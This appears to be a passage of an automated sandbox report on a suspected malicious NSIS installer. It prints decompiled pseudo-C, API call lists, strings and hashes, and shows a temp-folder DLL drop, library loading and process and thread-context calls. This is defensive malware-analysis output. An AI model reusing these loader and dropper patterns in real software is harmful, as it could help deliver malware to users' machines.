                                                                                                							 *0x42eb70 = _t94;
                                                                                                							 *0x42eb78 =  *_t94;
                                                                                                							if((_v44 & 0x00000001) != 0) {
                                                                                                								 *0x42eb7c =  *0x42eb7c + 1;
                                                                                                								__eflags =  *0x42eb7c;
                                                                                                							}
                                                                                                							_t40 = _t94 + 0x44; // 0x44
                                                                                                							_t59 = _t40;
                                                                                                							_t85 = 8;
                                                                                                							do {
                                                                                                								_t59 = _t59 - 8;
                                                                                                								 *_t59 =  *_t59 + _t94;
                                                                                                								_t85 = _t85 - 1;
                                                                                                								__eflags = _t85;
                                                                                                							} while (_t85 != 0);
                                                                                                							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                                                                							 *(_t94 + 0x3c) = _t60;
                                                                                                							E004055C3(0x42eb80, _t94 + 4, 0x40);
                                                                                                							__eflags = 0;
                                                                                                							return 0;
                                                                                                						}
                                                                                                						goto L29;
                                                                                                					}
                                                                                                					E00403098( *0x414b78);
                                                                                                					_t65 = E00403066( &_a4, 4); // executed
                                                                                                					__eflags = _t65;
                                                                                                					if(_t65 == 0) {
                                                                                                						goto L29;
                                                                                                					}
                                                                                                					__eflags = _v12 - _a4;
                                                                                                					if(_v12 != _a4) {
                                                                                                						goto L29;
                                                                                                					}
                                                                                                					goto L28;
                                                                                                				} else {
                                                                                                					do {
                                                                                                						_t67 =  *0x42eb74; // 0x33000
                                                                                                						_t90 = _t93;
                                                                                                						asm("sbb eax, eax");
                                                                                                						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
                                                                                                						__eflags = _t93 - _t70;
                                                                                                						if(_t93 >= _t70) {
                                                                                                							_t90 = _t70;
                                                                                                						}
                                                                                                						_t71 = E00403066(0x420b88, _t90); // executed
                                                                                                						__eflags = _t71;
                                                                                                						if(_t71 == 0) {
                                                                                                							E00402BB0(1);
                                                                                                							L29:
                                                                                                							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                                                						}
                                                                                                						__eflags =  *0x42eb74;
                                                                                                						if( *0x42eb74 != 0) {
                                                                                                							__eflags = _a4 & 0x00000002;
                                                                                                							if((_a4 & 0x00000002) == 0) {
                                                                                                								E00402BB0(0);
                                                                                                							}
                                                                                                							goto L20;
                                                                                                						}
                                                                                                						E004055C3( &_v44, 0x420b88, 0x1c);
                                                                                                						_t77 = _v44;
                                                                                                						__eflags = _t77 & 0xfffffff0;
                                                                                                						if((_t77 & 0xfffffff0) != 0) {
                                                                                                							goto L20;
                                                                                                						}
                                                                                                						__eflags = _v40 - 0xdeadbeef;
                                                                                                						if(_v40 != 0xdeadbeef) {
                                                                                                							goto L20;
                                                                                                						}
                                                                                                						__eflags = _v28 - 0x74736e49;
                                                                                                						if(_v28 != 0x74736e49) {
                                                                                                							goto L20;
                                                                                                						}
                                                                                                						__eflags = _v32 - 0x74666f73;
                                                                                                						if(_v32 != 0x74666f73) {
                                                                                                							goto L20;
                                                                                                						}
                                                                                                						__eflags = _v36 - 0x6c6c754e;
                                                                                                						if(_v36 != 0x6c6c754e) {
                                                                                                							goto L20;
                                                                                                						}
                                                                                                						_a4 = _a4 | _t77;
                                                                                                						_t87 =  *0x414b78; // 0xcb782
                                                                                                						 *0x42ec00 =  *0x42ec00 | _a4 & 0x00000002;
                                                                                                						_t80 = _v20;
                                                                                                						__eflags = _t80 - _t93;
                                                                                                						 *0x42eb74 = _t87;
                                                                                                						if(_t80 > _t93) {
                                                                                                							goto L29;
                                                                                                						}
                                                                                                						__eflags = _a4 & 0x00000008;
                                                                                                						if((_a4 & 0x00000008) != 0) {
                                                                                                							L16:
                                                                                                							_v8 = _v8 + 1;
                                                                                                							_t24 = _t80 - 4; // 0x409154
                                                                                                							_t93 = _t24;
                                                                                                							__eflags = _t90 - _t93;
                                                                                                							if(_t90 > _t93) {
                                                                                                								_t90 = _t93;
                                                                                                							}
                                                                                                							goto L20;
                                                                                                						}
                                                                                                						__eflags = _a4 & 0x00000004;
                                                                                                						if((_a4 & 0x00000004) != 0) {
                                                                                                							break;
                                                                                                						}
                                                                                                						goto L16;
                                                                                                						L20:
                                                                                                						__eflags = _t93 -  *0x428b88; // 0xcb786
                                                                                                						if(__eflags < 0) {
                                                                                                							_v12 = E00405CB5(_v12, 0x420b88, _t90);
                                                                                                						}
                                                                                                						 *0x414b78 =  *0x414b78 + _t90;
                                                                                                						_t93 = _t93 - _t90;
                                                                                                						__eflags = _t93;
                                                                                                					} while (_t93 > 0);
                                                                                                					_t82 = 0;
                                                                                                					__eflags = 0;
                                                                                                					goto L24;
                                                                                                				}
                                                                                                			}

































                                                                                                0x00402de1
                                                                                                0x00402d9b
                                                                                                0x00402da6
                                                                                                0x00402dab
                                                                                                0x00402dad
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00402db2
                                                                                                0x00402db5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00402c99
                                                                                                0x00402c9e
                                                                                                0x00402c9e
                                                                                                0x00402ca3
                                                                                                0x00402ca7
                                                                                                0x00402cae
                                                                                                0x00402cb3
                                                                                                0x00402cb5
                                                                                                0x00402cb7
                                                                                                0x00402cb7
                                                                                                0x00402cbb
                                                                                                0x00402cc0
                                                                                                0x00402cc2
                                                                                                0x00402dec
                                                                                                0x00402de3
                                                                                                0x00000000
                                                                                                0x00402de3
                                                                                                0x00402cc8
                                                                                                0x00402ccf
                                                                                                0x00402d4b
                                                                                                0x00402d4f
                                                                                                0x00402d53
                                                                                                0x00402d58
                                                                                                0x00000000
                                                                                                0x00402d4f
                                                                                                0x00402cd8
                                                                                                0x00402cdd
                                                                                                0x00402ce0
                                                                                                0x00402ce5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00402ce7
                                                                                                0x00402cee
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00402cf0
                                                                                                0x00402cf7
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00402cf9
                                                                                                0x00402d00
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00402d02
                                                                                                0x00402d09
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00402d0b
                                                                                                0x00402d11
                                                                                                0x00402d1a
                                                                                                0x00402d20
                                                                                                0x00402d23
                                                                                                0x00402d25
                                                                                                0x00402d2b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00402d31
                                                                                                0x00402d35
                                                                                                0x00402d3d
                                                                                                0x00402d3d
                                                                                                0x00402d40
                                                                                                0x00402d40
                                                                                                0x00402d43
                                                                                                0x00402d45
                                                                                                0x00402d47
                                                                                                0x00402d47
                                                                                                0x00000000
                                                                                                0x00402d45
                                                                                                0x00402d37
                                                                                                0x00402d3b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00402d59
                                                                                                0x00402d59
                                                                                                0x00402d5f
                                                                                                0x00402d6b
                                                                                                0x00402d6b
                                                                                                0x00402d6e
                                                                                                0x00402d74
                                                                                                0x00402d76
                                                                                                0x00402d76
                                                                                                0x00402d7e
                                                                                                0x00402d7e
                                                                                                0x00000000
                                                                                                0x00402d7e

                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 00402C1C
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\xxTzyGLZx5.exe,00000400), ref: 00402C38
                                                                                                  • Part of subcall function 00405602: GetFileAttributesA.KERNELBASE(00000003,00402C4B,C:\Users\user\Desktop\xxTzyGLZx5.exe,80000000,00000003), ref: 00405606
                                                                                                  • Part of subcall function 00405602: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405628
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\xxTzyGLZx5.exe,C:\Users\user\Desktop\xxTzyGLZx5.exe,80000000,00000003), ref: 00402C84
                                                                                                Strings
                                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402DE3
                                                                                                • soft, xrefs: 00402CF9
                                                                                                • C:\Users\user\Desktop, xrefs: 00402C66, 00402C6B, 00402C71
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C0B
                                                                                                • "C:\Users\user\Desktop\xxTzyGLZx5.exe" , xrefs: 00402C15
                                                                                                • Null, xrefs: 00402D02
                                                                                                • Inst, xrefs: 00402CF0
                                                                                                • C:\Users\user\Desktop\xxTzyGLZx5.exe, xrefs: 00402C22, 00402C31, 00402C45, 00402C65
                                                                                                • Error launching installer, xrefs: 00402C5B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                • String ID: "C:\Users\user\Desktop\xxTzyGLZx5.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\xxTzyGLZx5.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                • API String ID: 4283519449-130040084
                                                                                                • Opcode ID: 0c7fdcf59c0fb2b92b8374371fd2f99e1dcbb6099d677134b975e3fd63279e42
                                                                                                • Instruction ID: 825a226a8dc595578503c7203fc5804032ed62a4dd83b14a28db2b62ef09ea34
                                                                                                • Opcode Fuzzy Hash: 0c7fdcf59c0fb2b92b8374371fd2f99e1dcbb6099d677134b975e3fd63279e42
                                                                                                • Instruction Fuzzy Hash: 0651D371900214ABDF20AF75DE89BAE7BA8EF04319F10457BF500B22D1C7B89D418B9D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 60%
                                                                                                			E00401734(FILETIME* __ebx, void* __eflags) {
                                                                                                				void* _t33;
                                                                                                				void* _t41;
                                                                                                				void* _t43;
                                                                                                				FILETIME* _t49;
                                                                                                				FILETIME* _t62;
                                                                                                				void* _t64;
                                                                                                				signed int _t70;
                                                                                                				FILETIME* _t71;
                                                                                                				FILETIME* _t75;
                                                                                                				signed int _t77;
                                                                                                				void* _t80;
                                                                                                				CHAR* _t82;
                                                                                                				void* _t85;
                                                                                                
                                                                                                				_t75 = __ebx;
                                                                                                				_t82 = E004029E8(0x31);
                                                                                                				 *(_t85 - 8) = _t82;
                                                                                                				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
                                                                                                				_t33 = E0040548B(_t82);
                                                                                                				_push(_t82);
                                                                                                				if(_t33 == 0) {
                                                                                                					lstrcatA(E0040541E(E0040592B(0x409b78, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
                                                                                                				} else {
                                                                                                					_push(0x409b78);
                                                                                                					E0040592B();
                                                                                                				}
                                                                                                				E00405B89(0x409b78);
                                                                                                				while(1) {
                                                                                                					__eflags =  *(_t85 + 8) - 3;
                                                                                                					if( *(_t85 + 8) >= 3) {
                                                                                                						_t64 = E00405C22(0x409b78);
                                                                                                						_t77 = 0;
                                                                                                						__eflags = _t64 - _t75;
                                                                                                						if(_t64 != _t75) {
                                                                                                							_t71 = _t64 + 0x14;
                                                                                                							__eflags = _t71;
                                                                                                							_t77 = CompareFileTime(_t71, _t85 - 0x18);
                                                                                                						}
                                                                                                						asm("sbb eax, eax");
                                                                                                						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                                                                						__eflags = _t70;
                                                                                                						 *(_t85 + 8) = _t70;
                                                                                                					}
                                                                                                					__eflags =  *(_t85 + 8) - _t75;
                                                                                                					if( *(_t85 + 8) == _t75) {
                                                                                                						E004055E3(0x409b78);
                                                                                                					}
                                                                                                					__eflags =  *(_t85 + 8) - 1;
                                                                                                					_t41 = E00405602(0x409b78, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                                                                					__eflags = _t41 - 0xffffffff;
                                                                                                					 *(_t85 - 0x34) = _t41;
                                                                                                					if(_t41 != 0xffffffff) {
                                                                                                						break;
                                                                                                					}
                                                                                                					__eflags =  *(_t85 + 8) - _t75;
                                                                                                					if( *(_t85 + 8) != _t75) {
                                                                                                						E00404CC9(0xffffffe2,  *(_t85 - 8));
                                                                                                						__eflags =  *(_t85 + 8) - 2;
                                                                                                						if(__eflags == 0) {
                                                                                                							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                                                                						}
                                                                                                						L31:
                                                                                                						 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t85 - 4));
                                                                                                						__eflags =  *0x42ebe8;
                                                                                                						goto L32;
                                                                                                					} else {
                                                                                                						E0040592B(0x40a378, 0x42f000);
                                                                                                						E0040592B(0x42f000, 0x409b78);
                                                                                                						E0040594D(_t75, 0x40a378, 0x409b78, "C:\Users\jones\AppData\Local\Temp\nszE2AE.tmp\sozz.dll",  *((intOrPtr*)(_t85 - 0x10)));
                                                                                                						E0040592B(0x42f000, 0x40a378);
                                                                                                						_t62 = E004051EC("C:\Users\jones\AppData\Local\Temp\nszE2AE.tmp\sozz.dll",  *(_t85 - 0x24) >> 3) - 4;
                                                                                                						__eflags = _t62;
                                                                                                						if(_t62 == 0) {
                                                                                                							continue;
                                                                                                						} else {
                                                                                                							__eflags = _t62 == 1;
                                                                                                							if(_t62 == 1) {
                                                                                                								 *0x42ebe8 =  &( *0x42ebe8->dwLowDateTime);
                                                                                                								L32:
                                                                                                								_t49 = 0;
                                                                                                								__eflags = 0;
                                                                                                							} else {
                                                                                                								_push(0x409b78);
                                                                                                								_push(0xfffffffa);
                                                                                                								E00404CC9();
                                                                                                								L29:
                                                                                                								_t49 = 0x7fffffff;
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                					L33:
                                                                                                					return _t49;
                                                                                                				}
                                                                                                				E00404CC9(0xffffffea,  *(_t85 - 8));
                                                                                                				 *0x42ec14 =  *0x42ec14 + 1;
                                                                                                				_push(_t75);
                                                                                                				_push(_t75);
                                                                                                				_push( *(_t85 - 0x34));
                                                                                                				_push( *((intOrPtr*)(_t85 - 0x1c)));
                                                                                                				_t43 = E00402E44(); // executed
                                                                                                				 *0x42ec14 =  *0x42ec14 - 1;
                                                                                                				__eflags =  *(_t85 - 0x18) - 0xffffffff;
                                                                                                				_t80 = _t43;
                                                                                                				if( *(_t85 - 0x18) != 0xffffffff) {
                                                                                                					L22:
                                                                                                					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
                                                                                                				} else {
                                                                                                					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
                                                                                                					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
                                                                                                						goto L22;
                                                                                                					}
                                                                                                				}
                                                                                                				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
                                                                                                				__eflags = _t80 - _t75;
                                                                                                				if(_t80 >= _t75) {
                                                                                                					goto L31;
                                                                                                				} else {
                                                                                                					__eflags = _t80 - 0xfffffffe;
                                                                                                					if(_t80 != 0xfffffffe) {
                                                                                                						E0040594D(_t75, _t80, 0x409b78, 0x409b78, 0xffffffee);
                                                                                                					} else {
                                                                                                						E0040594D(_t75, _t80, 0x409b78, 0x409b78, 0xffffffe9);
                                                                                                						lstrcatA(0x409b78,  *(_t85 - 8));
                                                                                                					}
                                                                                                					_push(0x200010);
                                                                                                					_push(0x409b78);
                                                                                                					E004051EC();
                                                                                                					goto L29;
                                                                                                				}
                                                                                                				goto L33;
                                                                                                			}

















                                                                                                APIs
                                                                                                • lstrcatA.KERNEL32(00000000,00000000,cegrwbhzuj,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                                                                                                • CompareFileTime.KERNEL32(-00000014,?,cegrwbhzuj,cegrwbhzuj,00000000,00000000,cegrwbhzuj,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                                                                                                  • Part of subcall function 0040592B: lstrcpynA.KERNEL32(?,?,00000400,00403151,jpfyweowskz Setup,NSIS Error), ref: 00405938
                                                                                                  • Part of subcall function 00404CC9: lstrlenA.KERNEL32(004297B0,00000000,0041B732,73BCEA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
                                                                                                  • Part of subcall function 00404CC9: lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041B732,73BCEA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
                                                                                                  • Part of subcall function 00404CC9: lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041B732,73BCEA30), ref: 00404D25
                                                                                                  • Part of subcall function 00404CC9: SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
                                                                                                  • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404D5D
                                                                                                  • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404D77
                                                                                                  • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404D85
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nszE2AE.tmp$C:\Users\user\AppData\Local\Temp\nszE2AE.tmp\sozz.dll$cegrwbhzuj
                                                                                                • API String ID: 1941528284-2584084563
                                                                                                • Opcode ID: 9637652f00c021062d2dbe4245cc16957b59b03da3b62afee8cfd87e020825ba
                                                                                                • Instruction ID: 57f74d31a3863b2a576bf3fc3f2571be4e71849821accf25204d9298bb77468e
                                                                                                • Opcode Fuzzy Hash: 9637652f00c021062d2dbe4245cc16957b59b03da3b62afee8cfd87e020825ba
                                                                                                • Instruction Fuzzy Hash: 6C41B471900515FACF10BBB5DD46EAF36A9EF01368B20433BF511B21E1D63C8E418AAE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 95%
                                                                                                			E00402E44(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
                                                                                                				signed int _v8;
                                                                                                				long _v12;
                                                                                                				void* _v16;
                                                                                                				long _v20;
                                                                                                				long _v24;
                                                                                                				intOrPtr _v28;
                                                                                                				char _v92;
                                                                                                				void* _t67;
                                                                                                				void* _t68;
                                                                                                				long _t74;
                                                                                                				intOrPtr _t79;
                                                                                                				long _t80;
                                                                                                				void* _t82;
                                                                                                				int _t84;
                                                                                                				intOrPtr _t95;
                                                                                                				void* _t97;
                                                                                                				void* _t100;
                                                                                                				long _t101;
                                                                                                				signed int _t102;
                                                                                                				long _t103;
                                                                                                				int _t104;
                                                                                                				intOrPtr _t105;
                                                                                                				long _t106;
                                                                                                				void* _t107;
                                                                                                
                                                                                                				_t102 = _a16;
                                                                                                				_t97 = _a12;
                                                                                                				_v12 = _t102;
                                                                                                				if(_t97 == 0) {
                                                                                                					_v12 = 0x8000;
                                                                                                				}
                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                				_v16 = _t97;
                                                                                                				if(_t97 == 0) {
                                                                                                					_v16 = 0x418b80;
                                                                                                				}
                                                                                                				_t65 = _a4;
                                                                                                				if(_a4 >= 0) {
                                                                                                					_t95 =  *0x42ebb8; // 0x345fd
                                                                                                					E00403098(_t95 + _t65);
                                                                                                				}
                                                                                                				_t67 = E00403066( &_a16, 4); // executed
                                                                                                				if(_t67 == 0) {
                                                                                                					L34:
                                                                                                					_push(0xfffffffd);
                                                                                                					goto L35;
                                                                                                				} else {
                                                                                                					if((_a19 & 0x00000080) == 0) {
                                                                                                						if(_t97 == 0) {
                                                                                                							while(_a16 > 0) {
                                                                                                								_t103 = _v12;
                                                                                                								if(_a16 < _t103) {
                                                                                                									_t103 = _a16;
                                                                                                								}
                                                                                                								if(E00403066(0x414b80, _t103) == 0) {
                                                                                                									goto L34;
                                                                                                								} else {
                                                                                                									if(WriteFile(_a8, 0x414b80, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
                                                                                                										L29:
                                                                                                										_push(0xfffffffe);
                                                                                                										L35:
                                                                                                										_pop(_t68);
                                                                                                										return _t68;
                                                                                                									} else {
                                                                                                										_v8 = _v8 + _t103;
                                                                                                										_a16 = _a16 - _t103;
                                                                                                										continue;
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                							L45:
                                                                                                							return _v8;
                                                                                                						}
                                                                                                						if(_a16 < _t102) {
                                                                                                							_t102 = _a16;
                                                                                                						}
                                                                                                						if(E00403066(_t97, _t102) != 0) {
                                                                                                							_v8 = _t102;
                                                                                                							goto L45;
                                                                                                						} else {
                                                                                                							goto L34;
                                                                                                						}
                                                                                                					}
                                                                                                					_t74 = GetTickCount();
                                                                                                					 *0x40b4e4 =  *0x40b4e4 & 0x00000000;
                                                                                                					 *0x40b4e0 =  *0x40b4e0 & 0x00000000;
                                                                                                					_t14 =  &_a16;
                                                                                                					 *_t14 = _a16 & 0x7fffffff;
                                                                                                					_v20 = _t74;
                                                                                                					 *0x40afc8 = 8;
                                                                                                					 *0x414b70 = 0x40cb68;
                                                                                                					 *0x414b6c = 0x40cb68;
                                                                                                					 *0x414b68 = 0x414b68;
                                                                                                					_a4 = _a16;
                                                                                                					if( *_t14 <= 0) {
                                                                                                						goto L45;
                                                                                                					} else {
                                                                                                						goto L9;
                                                                                                					}
                                                                                                					while(1) {
                                                                                                						L9:
                                                                                                						_t104 = 0x4000;
                                                                                                						if(_a16 < 0x4000) {
                                                                                                							_t104 = _a16;
                                                                                                						}
                                                                                                						if(E00403066(0x414b80, _t104) == 0) {
                                                                                                							goto L34;
                                                                                                						}
                                                                                                						_a16 = _a16 - _t104;
                                                                                                						 *0x40afb8 = 0x414b80;
                                                                                                						 *0x40afbc = _t104;
                                                                                                						while(1) {
                                                                                                							_t100 = _v16;
                                                                                                							 *0x40afc0 = _t100;
                                                                                                							 *0x40afc4 = _v12;
                                                                                                							_t79 = E00405D23(0x40afb8);
                                                                                                							_v28 = _t79;
                                                                                                							if(_t79 < 0) {
                                                                                                								break;
                                                                                                							}
                                                                                                							_t105 =  *0x40afc0; // 0x41b732
                                                                                                							_t106 = _t105 - _t100;
                                                                                                							_t80 = GetTickCount();
                                                                                                							_t101 = _t80;
                                                                                                							if(( *0x42ec14 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
                                                                                                								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                                                                								_t107 = _t107 + 0xc;
                                                                                                								E00404CC9(0,  &_v92);
                                                                                                								_v20 = _t101;
                                                                                                							}
                                                                                                							if(_t106 == 0) {
                                                                                                								if(_a16 > 0) {
                                                                                                									goto L9;
                                                                                                								}
                                                                                                								goto L45;
                                                                                                							} else {
                                                                                                								if(_a12 != 0) {
                                                                                                									_t82 =  *0x40afc0; // 0x41b732
                                                                                                									_v8 = _v8 + _t106;
                                                                                                									_v12 = _v12 - _t106;
                                                                                                									_v16 = _t82;
                                                                                                									L24:
                                                                                                									if(_v28 != 1) {
                                                                                                										continue;
                                                                                                									}
                                                                                                									goto L45;
                                                                                                								}
                                                                                                								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
                                                                                                								if(_t84 == 0 || _v24 != _t106) {
                                                                                                									goto L29;
                                                                                                								} else {
                                                                                                									_v8 = _v8 + _t106;
                                                                                                									goto L24;
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                						_push(0xfffffffc);
                                                                                                						goto L35;
                                                                                                					}
                                                                                                					goto L34;
                                                                                                				}
                                                                                                			}




























                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 00402EAB
                                                                                                • GetTickCount.KERNEL32 ref: 00402F52
                                                                                                • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F7B
                                                                                                • wsprintfA.USER32 ref: 00402F8B
                                                                                                • WriteFile.KERNELBASE(00000000,00000000,0041B732,7FFFFFFF,00000000), ref: 00402FB9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: CountTick$FileWritewsprintf
                                                                                                • String ID: ... %d%%$icalSection
                                                                                                • API String ID: 4209647438-802315215
                                                                                                • Opcode ID: 82a9aedbd2f3b533e53c55a0f3032eb9fe86cf46c86e88442e97a38cb8fe0156
                                                                                                • Instruction ID: 9e0124e4ae7d277b0b54c9942477664c6d45ab1b3c5c68ad5b6cbbf63d84754e
                                                                                                • Opcode Fuzzy Hash: 82a9aedbd2f3b533e53c55a0f3032eb9fe86cf46c86e88442e97a38cb8fe0156
                                                                                                • Instruction Fuzzy Hash: A5619E7180120ADBDF10DF65DA48A9F7BB8BB44365F10413BE910B72C4C778DA51DBAA
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 6EDC3166
                                                                                                • GetThreadContext.KERNELBASE(?,00010007), ref: 6EDC3189
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ContextCreateProcessThread
                                                                                                • String ID: D
                                                                                                • API String ID: 2843130473-2746444292
                                                                                                • Opcode ID: fab4b06c36a52b175d459c89c80838db2ff9fe0d2f890745020cbef4d1286ed1
                                                                                                • Instruction ID: 0ad0dc471f9b8d1121d53012a60dd925a682bb599ab19b0d5102eaaa3c7e7016
                                                                                                • Opcode Fuzzy Hash: fab4b06c36a52b175d459c89c80838db2ff9fe0d2f890745020cbef4d1286ed1
                                                                                                • Instruction Fuzzy Hash: 12A10571E40109EFDB40DFE4C984BAEBBB9BF08B89F1044A5E515EB290D731AA41CF11
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 57%
                                                                                                			E00401F51(void* __ebx, void* __eflags) {
                                                                                                				struct HINSTANCE__* _t18;
                                                                                                				struct HINSTANCE__* _t25;
                                                                                                				void* _t26;
                                                                                                				struct HINSTANCE__* _t29;
                                                                                                				CHAR* _t31;
                                                                                                				intOrPtr* _t32;
                                                                                                				void* _t33;
                                                                                                
                                                                                                				_t26 = __ebx;
                                                                                                				asm("sbb eax, 0x42ec18");
                                                                                                				 *(_t33 - 4) = 1;
                                                                                                				if(__eflags < 0) {
                                                                                                					_push(0xffffffe7);
                                                                                                					L14:
                                                                                                					E00401423();
                                                                                                					L15:
                                                                                                					 *0x42ebe8 =  *0x42ebe8 +  *(_t33 - 4);
                                                                                                					return 0;
                                                                                                				}
                                                                                                				_t31 = E004029E8(0xfffffff0);
                                                                                                				 *(_t33 + 8) = E004029E8(1);
                                                                                                				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
                                                                                                					L3:
                                                                                                					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
                                                                                                					_t29 = _t18;
                                                                                                					if(_t29 == _t26) {
